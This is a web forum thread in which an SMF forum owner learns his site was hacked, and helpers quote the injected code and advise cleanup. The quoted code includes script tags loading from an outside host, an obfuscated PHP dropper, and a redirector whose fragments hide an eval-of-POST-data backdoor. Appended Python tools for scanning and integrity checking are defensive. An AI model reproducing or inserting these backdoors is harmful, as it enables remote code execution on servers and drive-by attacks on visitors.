Weird indexing issue? Need help

Started by Alb0, April 29, 2012, 11:30:13 PM


Alb0

So this just recently started happening with my site, and I haven't the slightest clue as to why. Whenever you visit my site, www.velocity-server.com, you'll notice that the indexing of the template is weirdly off, looking at the search box. Also the text is enlarged, creating an off look to it.
Although, if you refresh the page about 2 times, everything reverts back to normal and the issue disappears. I haven't downloaded any mods as of late, and I also uninstalled the very last mods I implemented, just to be on the safe side, yet the issue still exists.

Any idea as to what it could be?  :(

My forum is currently running on SMF 2.0.2

vbgamer45

Your website has been hacked; code has been injected into your files.
If you view the source of your webpage, the very first line is:

<script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script 
src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Alb0

Oh my. Any possible way to extract that, and prevent it from happening again? I'm very limited when it comes to this, so I apologize if I may seem ignorant.
Should I be worried? That sounds serious.

vbgamer45

Yeah, I would do a backup of your files and database. Then reinstall the SMF files for your forum.
I do recommend deleting the files first before reuploading the SMF files, if possible.

Alb0

Oh this is gonna be terrible. I backed up my whole database, backed up my whole directory to the forums as well. I tried re-installing SMF, overwriting the files, yet I ran into quite a bit of trouble. Was getting errors left and right. This is sad as my forum is pretty huge with 9k+ posts.

Which files do you recommend deleting first? And did you mean reupload ALL the SMF files, or just certain ones?

vbgamer45


Alb0

So what you're basically saying is a fresh re-install of SMF? That would mean I would have to do everything over: mods, custom work, everything? This is a real bummer, as I don't see any other way.

Alb0

This code seems to have been inserted into most of the PHP files, which wasn't there prior.

Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}

Any clue how I could remove that from the PHP files without having to go through each single one?

roqueiro

I found this:
Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}                                    

And this:
Quote
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

In these files:
Base folder:
index.php
Settings.php

Sources folder:
Admin.php
Aeva-Sites.php
CustomForm.php
Display.php
Load.php
ManageBoards.php
ManageMaintenance.php
ManageSettings.php
ModerationCenter.php
ModSettings.php
PersonalMessage.php
Poll.php
Post.php
Profile-View.php
ScheduledTasks.php
Subs.php
Subs-Aeva.php
Subs-Aeva-Admin.php
Subs-Aeva-Custom-Example.php
Subs-Aeva-Sites.php
Subs-Boards.php
Subs-Editor.php
Subs-Members.php
Subs-Menu.php
Subs-Package.php
Subs-TopicRating.php

Themes\Default folder:
MessageIndex.template.php
TopicRating.template.php

Themes\Default\Language folder:
ManageScheduledTasks.english.php
Modifications.english.php
Modifications.portuguese_brazilian-utf8.php
TopicRating.english.php
TopicRating.russian.php
TopicRating.russian-utf8.php
TopicRating.spanish_es-utf8.php

Themes\Mytheme folder:
MessageIndex.template

IDK how these files have been hacked/modified. The modified date has not been changed.
For security, after correcting the files, change passwords.

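Added example, not from this thread or from SMF: a Python scanner built from the two fragments roqueiro quoted, answering Alb0's question of how to find and strip the injected code from every .php file without opening each one. The regexes, the `.infected` backup name and the helper names are my own; `decode_xor_array` shows that fragment 1's number array, XOR'd with 8, spells out the pieces of `<script>document.cookie="location=...` and the phukjik.cri2.go.th URL that vbgamer45 saw in the page source.

```python
import os
import re
# Signatures for the two injected fragments quoted in this thread.  Fragment 1's
# "showimg" tail is optional because the copy Alb0 posted ends before it.
SIGNATURES = {
    "xor_cookie_dropper": re.compile(
        r'\$s=substr\(8,1\);foreach\(array\([\d,]+\)as\$v\)\{.*?'
        r'urlencode\(strrev\(\$d\)\)\.\$t\[7\]\.\$t\[3\]\.\$t\[0\]\.\$t\[9\]\.\$t\[1\]\.\$t\[3\]\);\}'
        r'(?:if\(isset\(\$_POST\["showimg"\]\)\)\{eval\(base64_decode\(str_replace\('
        r'chr\(32\),chr\(43\),\$_POST\["showimg"\]\)\)\);exit;\})?', re.S),
    "sessdt_redirector": re.compile(
        r'global \$sessdt_o;.*?\$_POST\[\$sessdt_p\]\)\)\);exit;\} \}', re.S),
}
# Generic tell for variants not covered above: eval() of base64 taken from POST.
EVAL_POST = re.compile(r'eval\(base64_decode\([^;]*\$_POST\[')

def decode_xor_array(values, key=8):
    """Reverse fragment 1's sprintf('%c', $v ^ 8) loop to read what it echoes."""
    return "".join(chr(v ^ key) for v in values)

def scan_source(src):
    """Names of the signatures found in one file's contents."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(src)]
    if not hits and EVAL_POST.search(src):
        hits.append("unknown_eval_post_backdoor")
    return hits

def clean_source(src):
    """Remove exact signature matches only; returns (cleaned text, count removed)."""
    total = 0
    for rx in SIGNATURES.values():
        src, n = rx.subn("", src)
        total += n
    return src, total

def scan_tree(root, fix=False):
    """Map relative path -> hits for each .php under root.  With fix=True the
    original is kept as <name>.infected and the cleaned text written back."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hits = scan_source(src)
            if hits:
                report[os.path.relpath(path, root)] = hits
            cleaned, n = clean_source(src) if fix else (src, 0)
            if n:
                os.replace(path, path + ".infected")
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(cleaned)
    return report
```

Files flagged as `unknown_eval_post_backdoor` are reported but never edited, since only an exact signature match is stripped; those still need the file-by-file replacement vbgamer45 describes.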

thecity

I know someone using WordPress; he has exactly the same problem.
All the plugin files are infected with this malicious code.

Warning your host is a good idea. Those ****** Russians..

MrPhil

Disable your site (put it in maintenance mode) so if the hack contains any drive-by infections, your users have less of a chance of picking up something while you do cleanup. Even better would be to insert an index.html file that just says "Sorry, temporarily closed while cleaning up.".

First, you need to figure out how the hacker got in and plug up those security holes before doing anything else. Work with your host to look at access logs. Check that you aren't granting ridiculous permissions such as 777 all over the place. Scan your PC (used to administer the site and forum) for spyware, password sniffers, and keystroke loggers. Enable the PC firewall and make sure the antivirus scanner is working. Change all the passwords: site account access, SMF Admin, FTP, and even the database if you feel up to it.

Then you either

  • edit the files one by one, or
  • erase all files EXCEPT Settings.php, Settings_bak.php, avatars, and attachments, and either

    • restore all files from a known good backup, or
    • copy in all the files in a "Large Upgrade" to refresh your SMF system, then re-install all mods and custom work

You want to make sure you don't leave any unaccounted-for files lying around, that might be backdoors or Trojans. Most hacks don't involve the database, but keep an eye out for any evidence that has happened (that will be an ugly cleanup job!).
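Added example, not part of MrPhil's post: a Python integrity check for his last point, comparing the live forum tree against a clean download of the same SMF release so that modified files, files with no counterpart in the clean copy, and world-writable files (the "777 all over the place" problem) are listed. The keep list mirrors the files he says to preserve; function names and the sample data in the comments are my own, and files added by installed mods will show up as unaccounted until checked against their packages.

```python
import hashlib
import os
import stat

# Site-specific items MrPhil says to keep; a clean SMF copy will not contain them,
# so they are not reported as unaccounted for.
KEEP_FILES = {"Settings.php", "Settings_bak.php"}
KEEP_DIRS = ("avatars/", "attachments/")

def snapshot(root):
    """Map relative path -> (sha256 hex, world-writable?) for every file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            writable = bool(os.stat(full).st_mode & stat.S_IWOTH)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = (digest, writable)
    return out

def is_site_data(path):
    """True for the files and folders that legitimately differ from a clean copy."""
    return path in KEEP_FILES or path.startswith(KEEP_DIRS)

def compare(clean, live):
    """Classify the live tree against a clean copy of the same SMF release.
    Both arguments are snapshot() dicts, so constructed data works too, e.g.
    compare(snapshot("smf-2.0.2-clean"), snapshot("public_html/forum"))."""
    return {
        "modified": sorted(p for p in live
                           if p in clean and live[p][0] != clean[p][0]),
        "unaccounted": sorted(p for p in live
                              if p not in clean and not is_site_data(p)),
        "missing": sorted(p for p in clean if p not in live),
        "world_writable": sorted(p for p, (_, w) in live.items() if w),
    }
```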
